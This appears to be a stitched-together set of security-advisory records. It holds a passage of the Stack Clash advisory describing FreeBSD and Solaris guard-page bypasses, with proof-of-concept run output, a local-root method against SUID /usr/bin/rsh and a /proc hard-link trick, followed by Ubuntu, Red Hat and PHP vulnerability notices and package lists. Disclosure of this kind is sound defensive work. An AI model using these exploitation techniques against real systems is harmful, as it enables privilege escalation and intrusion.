stack_entry-\u003estart - grow_amount;\n\n /*\n * If this puts us into the previous entry, cut back our\n * growth to the available space. Also, see the note above. \n */\n if (addr \u003c end) {\n stack_entry-\u003eavail_ssize = max_grow;\n addr = end;\n if (stack_guard_page)\n addr += PAGE_SIZE;\n }\n\n where:\n\n . addr is the new start of the stack;\n\n . stack_entry-\u003estart is the old start of the stack;\n\n . grow_amount is the size of the stack expansion;\n\n . end is the end of the memory region below the stack. \n\n Unfortunately, the \"addr \u003c end\" test should be \"addr \u003c= end\": if addr,\n the new start of the stack, is equal to end, the end of the memory\n region mapped below, then the stack guard-page is eliminated\n (CVE-2017-1084). In our proof-of-concept:\n\n . we allocate anonymous mmap()s of 4KB, until the end of an anonymous\n mmap() reaches a randomly chosen distance below the start of the\n stack [Step 1];\n\n . we call a recursive function until the stack-pointer reaches the\n start of the stack, and the stack expansion reaches the end of the\n anonymous mmap() below [Step 2];\n\n . we do not jump over the stack guard-page, because each call to the\n recursive function allocates (and fully writes to) a 1KB stack-based\n buffer [Step 3];\n\n . and we crash into the stack guard-page most of the time;\n\n . but we survive with a probability of 4KB/128KB=1/32 (grow_amount is\n always a multiple of SGROWSIZ, 128KB) because CVE-2017-1084 has\n effectively eliminated the stack guard-page in Step 2. \n\n% sysctl security.bsd.stack_guard_page\nsecurity.bsd.stack_guard_page: 1\n\n% sh -c \u0027while true; do ./FreeBSD_CVE-2017-FGPE; done\u0027\nSegmentation fault\nchar at 0xbe45e000: 41; final dist 6097 (24778705)\nSegmentation fault\nSegmentation fault\nSegmentation fault\n... \nSegmentation fault\nSegmentation fault\nSegmentation fault\nchar at 0xbd25e000: 41; final dist 7036 (43654012)\nSegmentation fault\nSegmentation fault\nSegmentation fault\n... \nSegmentation fault\nSegmentation fault\nSegmentation fault\nchar at 0xbd29e000: 41; final dist 5331 (43390163)\nSegmentation fault\nSegmentation fault\nSegmentation fault\n... \n\n In contrast, if FreeBSD\u0027s stack guard-page is disabled, our\n proof-of-concept always survives:\n\n# sysctl security.bsd.stack_guard_page=0\nsecurity.bsd.stack_guard_page: 1 -\u003e 0\n\n% sh -c \u0027while true; do ./FreeBSD_CVE-2017-FGPE; done\u0027\nchar at 0xbe969000: 41; final dist 89894 (19488550)\nchar at 0xbfa6d000: 41; final dist 74525 (1647389)\nchar at 0xbf4df000: 41; final dist 78 (7471182)\nchar at 0xbe9e4000: 41; final dist 112397 (18986765)\nchar at 0xbf693000: 41; final dist 49811 (5685907)\nchar at 0xbf533000: 41; final dist 51037 (7128925)\nchar at 0xbd799000: 41; final dist 26043 (38167995)\nchar at 0xbd54b000: 11; final dist 83754 (40585002)\nchar at 0xbe176000: 41; final dist 36992 (27824256)\nchar at 0xbfa91000: 41; final dist 57449 (1499241)\nchar at 0xbd1b9000: 41; final dist 26115 (44328451)\nchar at 0xbd1c8000: 41; final dist 94852 (44266116)\nchar at 0xbf73a000: 41; final dist 22276 (5003012)\nchar at 0xbe6b1000: 41; final dist 58854 (22341094)\nchar at 0xbeb81000: 41; final dist 124727 (17295159)\nchar at 0xbfb35000: 41; final dist 43174 (829606)\n... \n\n- FreeBSD\u0027s thread library (libthr) mmap()s a secondary PROT_NONE stack\n guard-page at a distance RLIMIT_STACK below the end of the stack:\n\n# sysctl security.bsd.stack_guard_page=1\nsecurity.bsd.stack_guard_page: 0 -\u003e 1\n\n% sh -c \u0027exec procstat -v $$\u0027\n PID START END PRT RES PRES REF SHD FLAG TP PATH\n 2779 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat\n... \n 2779 0x28400000 0x28800000 rw- 22 35 2 0 ---- df\n 2779 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df\n 2779 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph\n\n% sh -c \u0027LD_PRELOAD=libthr.so exec procstat -v $$\u0027\n PID START END PRT RES PRES REF SHD FLAG TP PATH\n 2798 0x8048000 0x8050000 r-x 8 8 1 0 CN-- vn /usr/bin/procstat\n... \n 2798 0x28400000 0x28800000 rw- 23 35 2 0 ---- df\n 2798 0xbbbfe000 0xbbbff000 --- 0 0 0 0 ---- --\n 2798 0xbfbdf000 0xbfbff000 rwx 3 3 1 0 ---D df\n 2798 0xbfbff000 0xbfc00000 r-x 1 1 23 0 ---- ph\n\n Unfortunately, this secondary stack guard-page does not mitigate the\n vulnerabilities that we discovered in FreeBSD\u0027s stack guard-page\n implementation:\n\n% sysctl security.bsd.stack_guard_page\nsecurity.bsd.stack_guard_page: 1\n\n% sh -c \u0027LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPU\u0027\nchar at 0xbfbde000: 41\n\n% sh -c \u0027while true; do LD_PRELOAD=libthr.so ./FreeBSD_CVE-2017-FGPE; done\u0027\nSegmentation fault\nSegmentation fault\nSegmentation fault\n... \nSegmentation fault\nSegmentation fault\nSegmentation fault\nchar at 0xbda5e000: 41; final dist 3839 (35262207)\nSegmentation fault\nSegmentation fault\nSegmentation fault\n... \nSegmentation fault\nSegmentation fault\nSegmentation fault\nchar at 0xbdb1e000: 41; final dist 3549 (34475485)\nSegmentation fault\nSegmentation fault\nSegmentation fault\n... \n\n========================================================================\nIV.4.4. Remote exploitation\n========================================================================\n\nBecause FreeBSD\u0027s stack guard-page is disabled by default, we tried (and\nfailed) to remotely exploit a test service vulnerable to:\n\n- an unlimited memory leak that allows us to malloc()ate gigabytes of\n memory;\n\n- a limited recursion that allows us to allocate up to 1MB of stack\n memory. \n\nFreeBSD\u0027s malloc() implementation (jemalloc) mmap()s 4MB chunks of\nanonymous memory that are aligned on multiples of 4MB. The first 4MB\nmmap() chunk starts at 0x28400000, and the last 4MB mmap() chunk ends at\n0xbf800000, because the stack itself already ends at 0xbfc00000; but it\nis impossible to cover this final mmap-stack distance (almost 4MB) with\nthe limited recursion (1MB) of our test service. \nbreak(0x80499b0) = 0 (0x0)\nbreak(0x8400000) = 0 (0x0)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 672845824 (0x281ad000)\nmmap(0x285ad000,2437120,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 677040128 (0x285ad000)\nmunmap(0x281ad000,2437120) = 0 (0x0)\nmmap(0x0,8388608,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 679477248 (0x28800000)\nmunmap(0x28c00000,4194304) = 0 (0x0)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 683671552 (0x28c00000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 687865856 (0x29000000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 692060160 (0x29400000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 696254464 (0x29800000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = 700448768 (0x29c00000)\n... \nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1103101952 (0xbe400000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1098907648 (0xbe800000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1094713344 (0xbec00000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1090519040 (0xbf000000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) = -1086324736 (0xbf400000)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 \u0027Cannot allocate memory\u0027\nbreak(0x8800000) = 0 (0x0)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 \u0027Cannot allocate memory\u0027\nbreak(0x8c00000) = 0 (0x0)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 \u0027Cannot allocate memory\u0027\nbreak(0x9000000) = 0 (0x0)\n... \nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 \u0027Cannot allocate memory\u0027\nbreak(0x27c00000) = 0 (0x0)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 \u0027Cannot allocate memory\u0027\nbreak(0x28000000) = 0 (0x0)\nmmap(0x0,4194304,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANON,-1,0x0) ERR#12 \u0027Cannot allocate memory\u0027\nbreak(0x28400000) ERR#12 \u0027Cannot allocate memory\u0027\n\n========================================================================\nIV.5. Solaris \u003e= 11.1\n========================================================================\n\n========================================================================\nIV.5.1. Minimal RLIMIT_STACK vulnerability (CVE-2017-3630)\n========================================================================\n\nOn Solaris, ASLR can be enabled or disabled for each ELF binary with the\nSUNW_ASLR dynamic section entry (man elfedit):\n\n$ elfdump /usr/bin/rsh | egrep \u0027ASLR|NX\u0027\n [39] SUNW_ASLR 0x2 ENABLE\n [40] SUNW_NXHEAP 0x2 ENABLE\n [41] SUNW_NXSTACK 0x2 ENABLE\n\nWithout ASLR\n\nIf ASLR is disabled:\n\n- a stack region of size RLIMIT_STACK is reserved in the address-space;\n\n- a 4KB stack guard-page is mapped directly below this stack region;\n\n- the runtime linker ld.so is mapped directly below this stack\n guard-page. \n\n$ cp /usr/bin/sleep . \n$ chmod u+w ./sleep\n$ elfedit -e \u0027dyn:sunw_aslr disable\u0027 ./sleep\n\n$ sh -c \u0027ulimit -S -s; ./sleep 3 \u0026 pmap -r ${!}\u0027\n8192\n7176: ./sleep 3\n... \nFE7B1000 228K r-x---- /lib/ld.so.1\nFE7FA000 8K rwx---- /lib/ld.so.1\nFE7FC000 8K rwx---- /lib/ld.so.1\nFE7FF000 8192K rw----- [ stack ]\n total 17148K\n\n$ sh -c \u0027ulimit -S -s 64; ./sleep 3 \u0026 pmap -r ${!}\u0027\n7244: ./sleep 3\n... \nFEFA1000 228K r-x---- /lib/ld.so.1\nFEFEA000 8K rwx---- /lib/ld.so.1\nFEFEC000 8K rwx---- /lib/ld.so.1\nFEFEF000 64K rw----- [ stack ]\n total 9020K\n\nOn the one hand, a local attacker can exploit this simplified\nstack-clash:\n\n- Step 1 (Clash) is not needed, because ld.so is naturally mapped\n directly below the stack (the distance between the end of ld.so\u0027s\n read-write segment and the start of the stack is 4KB, the stack\n guard-page);\n\n- Step 2 (Run) is not needed, because a local attacker can set\n RLIMIT_STACK to just a few kilobytes, reserve a very small stack\n region, and hence shorten the distance between the stack-pointer and\n the start of the stack (and the end of ld.so\u0027s read-write segment);\n\n- Step 3 (Jump) can be completed with a large stack-based buffer that is\n not fully written to;\n\n- Step 4b (Smash) can be completed by overwriting the function pointers\n in ld.so\u0027s read-write segment with the contents of a stack-based\n buffer. \n\nSuch a simplified stack-clash exploit was first mentioned in Gael\nDelalleau\u0027s 2005 presentation (slide 30). \n\nOn the other hand, a remote attacker cannot modify RLIMIT_STACK and must\ncomplete Step 2 (Run) with a recursive function that consumes the 8MB\n(the default RLIMIT_STACK) between the stack-pointer and the start of\nthe stack. \n\nWith ASLR\n\nIf ASLR is enabled:\n\n- a stack region of size RLIMIT_STACK is reserved in the address-space;\n\n- a 4KB stack guard-page is mapped directly below this stack region;\n\n- the runtime linker ld.so is mapped below this stack guard-page, but at\n a random distance (within a [4KB,128MB] range) -- effectively a large,\n secondary stack guard-page. \n\nOn the one hand, a local attacker can run the simplified \"Without ASLR\"\nstack-clash exploit until the ld.so-stack distance is minimal -- with a\nprobability of 4KB/128MB=1/32K, the distance between the end of ld.so\u0027s\nread-write segment and the start of the stack is exactly 8KB: the stack\nguard-page plus the minimum distance between the stack guard-page and\nld.so (CVE-2017-3629). \n\nOn the other hand, a remote attacker must complete Step 2 (Run) with a\nrecursive function, and:\n\n- has a good chance of exploiting this stack-clash after 32K connections\n (when the ld.so-stack distance is minimal) if the remote service\n re-execve()s (re-randomizes the ld.so-stack distance for each new\n connection);\n\n- cannot exploit this stack-clash if the remote service does not\n re-execve() (does not re-randomize the ld.so-stack distance for each\n new connection) unless the attacker is able to restart the service,\n reboot the server, or target a 32K-server farm. \n\n========================================================================\nIV.5.2. /usr/bin/rsh exploit\n========================================================================\n\n/usr/bin/rsh is SUID-root and its main() function allocates a 50KB\nstack-based buffer that is not written to and can be used to jump over\nthe stack guard-page, into ld.so\u0027s read-write segment, in Step 3 of our\nsimplified stack-clash exploit. \n\nNext, we discovered a general method for gaining eip control in Step 4b:\nsetlocale(LC_ALL, \"\"), called by the main() function of /usr/bin/rsh and\nother SUID binaries, copies the LC_ALL environment variable to several\nstack-based buffers and thus smashes ld.so\u0027s read-write segment and\noverwrites some of ld.so\u0027s function pointers. \n\nLast, we execute our own shell-code: we return-into-binary (/usr/bin/rsh\nis not a PIE), to an instruction that reliably jumps into a copy of our\nLC_ALL environment variable in ld.so\u0027s read-write segment, which is in\nfact read-write-executable. For example, after we gain control of eip:\n\n- on Solaris 11.1, we return to a \"pop; pop; ret\" instruction, because a\n pointer to our shell-code is stored at an 8-byte offset from esp;\n\n- on Solaris 11.3, we return to a \"call *0xc(%ebp)\" instruction, because\n a pointer to our shell-code is stored at a 12-byte offset from ebp. \n\nOur Solaris exploit brute-forces the random ld.so-stack distance and two\nparameters:\n\n- the RLIMIT_STACK;\n\n- the length of the LC_ALL environment variable. \n\n========================================================================\nIV.5.3. Forced-Privilege vulnerability (CVE-2017-3631)\n========================================================================\n\n/usr/bin/rsh is SUID-root, but the shell that we obtained in Step 4b of\nour stack-clash exploit did not grant us full root privileges, only\nnet_privaddr, the privilege to bind to a privileged port number. \nDisappointed by this result, we investigated and found:\n\n$ ggrep -r /usr/bin/rsh /etc 2\u003e/dev/null\n/etc/security/exec_attr.d/core-os:Forced Privilege:solaris:cmd:RO::/usr/bin/rsh:privs=net_privaddr\n\n$ /usr/bin/rsh -h\n/usr/bin/rsh: illegal option -- h\nusage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command\n rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host\n\n# cat truss.out\n... \n7319: execve(\"/usr/bin/rsh\", 0xA9479C548, 0xA94792808) argc = 2\n7319: *** FPRIV: P/E: net_privaddr ***\n... \n\nUnfortunately, this Forced-Privilege protection is based on the pathname\nof SUID-root binaries, which can be execve()d through hard-links, under\ndifferent pathnames (CVE-2017-3631). For example, we discovered that\nreadable SUID-root binaries can be execve()d through hard-links in\n/proc:\n\n$ sleep 3 \u003c /usr/bin/rsh \u0026 /proc/${!}/fd/0 -h\n[1] 7333\n/proc/7333/fd/0: illegal option -- h\nusage: rsh [ -PN / -PO ] [ -l login ] [ -n ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host command\n rsh [ -PN / -PO ] [ -l login ] [ -k realm ] [ -a ] [ -x ] [ -f / -F ] host\n\n# cat truss.out\n... \n7335: execve(\"/proc/7333/fd/0\", 0xA947CA508, 0xA94792808) argc = 2\n7335: *** SUID: ruid/euid/suid = 100 / 0 / 0 ***\n... \n\nThis vulnerability allows us to bypass the Forced-Privilege protection\nand obtain full root privileges with our /usr/bin/rsh exploit. \n\n\n========================================================================\nV. Acknowledgments\n========================================================================\n\nWe thank the members of the distros list, Oracle/Solaris, Exim, Sudo,\nsecurity@kernel.org, grsecurity/PaX, and OpenBSD. \n==========================================================================\nUbuntu Security Notice USN-3323-2\nJune 29, 2017\n\neglibc vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nGnu C library could be made to run programs as an administrator. This update provides the\ncorresponding update for Ubuntu 12.04 ESM. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n libc6 2.15-0ubuntu10.20\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nRed Hat 3scale API Management Platform 2.0 is a platform for the management\nof access and traffic for web-based APIs across a variety of deployment\noptions. \n\nSecurity Fix(es):\n\n* It was found that RH-3scale AMP would permit creation of an access token\nwithout a client secret. An attacker could use this flaw to circumvent\nauthentication controls and gain access to restricted APIs. (CVE-2017-7512)\n\nThe underlying container image was also rebuilt to resolve other security\nissues. Solution:\n\nTo apply this security fix, use the updated docker images. Bugs fixed (https://bugzilla.redhat.com/):\n\n1457997 - CVE-2017-7512 3scale AMP: validation bypass in oauth\n\n5",
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VAR-201506-0268
Vulnerability from variot - Updated: 2026-04-10 22:34The pcntl_exec implementation in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \x00 character, which might allow remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. PHP is prone to a security-bypass vulnerability. An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. A security vulnerability exists in PHP's implementation of pcntl_exec, which stems from the fact that the program does not allow null bytes in pathnames. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: php security and bug fix update Advisory ID: RHSA-2015:1135-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html Issue date: 2015-06-23 CVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 CVE-2015-4605 =====================================================================
- Summary:
Updated php packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.
A flaw was found in the way the PHP module for the Apache httpd web server handled pipelined requests. A remote attacker could use this flaw to trigger the execution of a PHP script in a deinitialized interpreter, causing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)
An uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application. (CVE-2015-0232)
An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022)
Multiple flaws were discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273, CVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)
It was found that certain PHP functions did not properly handle file names containing a NULL character. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026, CVE-2015-3411, CVE-2015-3412, CVE-2015-4598)
Multiple flaws were found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-2301, CVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)
Multiple flaws were found in PHP's File Information (fileinfo) extension. A remote attacker could cause a PHP application to crash if it used fileinfo to identify type of attacker supplied files. (CVE-2014-9652, CVE-2015-4604, CVE-2015-4605)
A heap buffer overflow flaw was found in the enchant_broker_request_dict() function of PHP's enchant extension. An attacker able to make a PHP application enchant dictionaries could possibly cause it to crash. (CVE-2014-9705)
A buffer over-read flaw was found in the GD library used by the PHP gd extension. A specially crafted GIF file could cause a PHP application using the imagecreatefromgif() function to crash. (CVE-2014-9709)
This update also fixes the following bugs:
-
The libgmp library in some cases terminated unexpectedly with a segmentation fault when being used with other libraries that use the GMP memory management. With this update, PHP no longer changes libgmp memory allocators, which prevents the described crash from occurring. (BZ#1212305)
-
When using the Open Database Connectivity (ODBC) API, the PHP process in some cases terminated unexpectedly with a segmentation fault. The underlying code has been adjusted to prevent this crash. (BZ#1212299)
-
Previously, running PHP on a big-endian system sometimes led to memory corruption in the fileinfo module. This update adjusts the behavior of the PHP pointer so that it can be freed without causing memory corruption. (BZ#1212298)
All php users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize() 1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142) 1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c 1188599 - CVE-2014-9652 file: out of bounds read in mconvert() 1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c 1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone 1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict() 1194747 - CVE-2015-2301 php: use after free in phar_object.c 1204868 - CVE-2015-4147 php: SoapClient's __call() type confusion through unserialize() 1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re 1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name 1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4 1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions 1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo 1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing 1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode() 1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS 1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods 1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+ 1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing 1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character 1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name 1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata() 1226916 - CVE-2015-4148 php: SoapClient's do_soap_call() type confusion after unserialize() 1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions 1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions 1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize 1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion
- Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
ppc64: php-5.4.16-36.el7_1.ppc64.rpm php-cli-5.4.16-36.el7_1.ppc64.rpm php-common-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-gd-5.4.16-36.el7_1.ppc64.rpm php-ldap-5.4.16-36.el7_1.ppc64.rpm php-mysql-5.4.16-36.el7_1.ppc64.rpm php-odbc-5.4.16-36.el7_1.ppc64.rpm php-pdo-5.4.16-36.el7_1.ppc64.rpm php-pgsql-5.4.16-36.el7_1.ppc64.rpm php-process-5.4.16-36.el7_1.ppc64.rpm php-recode-5.4.16-36.el7_1.ppc64.rpm php-soap-5.4.16-36.el7_1.ppc64.rpm php-xml-5.4.16-36.el7_1.ppc64.rpm php-xmlrpc-5.4.16-36.el7_1.ppc64.rpm
s390x: php-5.4.16-36.el7_1.s390x.rpm php-cli-5.4.16-36.el7_1.s390x.rpm php-common-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-gd-5.4.16-36.el7_1.s390x.rpm php-ldap-5.4.16-36.el7_1.s390x.rpm php-mysql-5.4.16-36.el7_1.s390x.rpm php-odbc-5.4.16-36.el7_1.s390x.rpm php-pdo-5.4.16-36.el7_1.s390x.rpm php-pgsql-5.4.16-36.el7_1.s390x.rpm php-process-5.4.16-36.el7_1.s390x.rpm php-recode-5.4.16-36.el7_1.s390x.rpm php-soap-5.4.16-36.el7_1.s390x.rpm php-xml-5.4.16-36.el7_1.s390x.rpm php-xmlrpc-5.4.16-36.el7_1.s390x.rpm
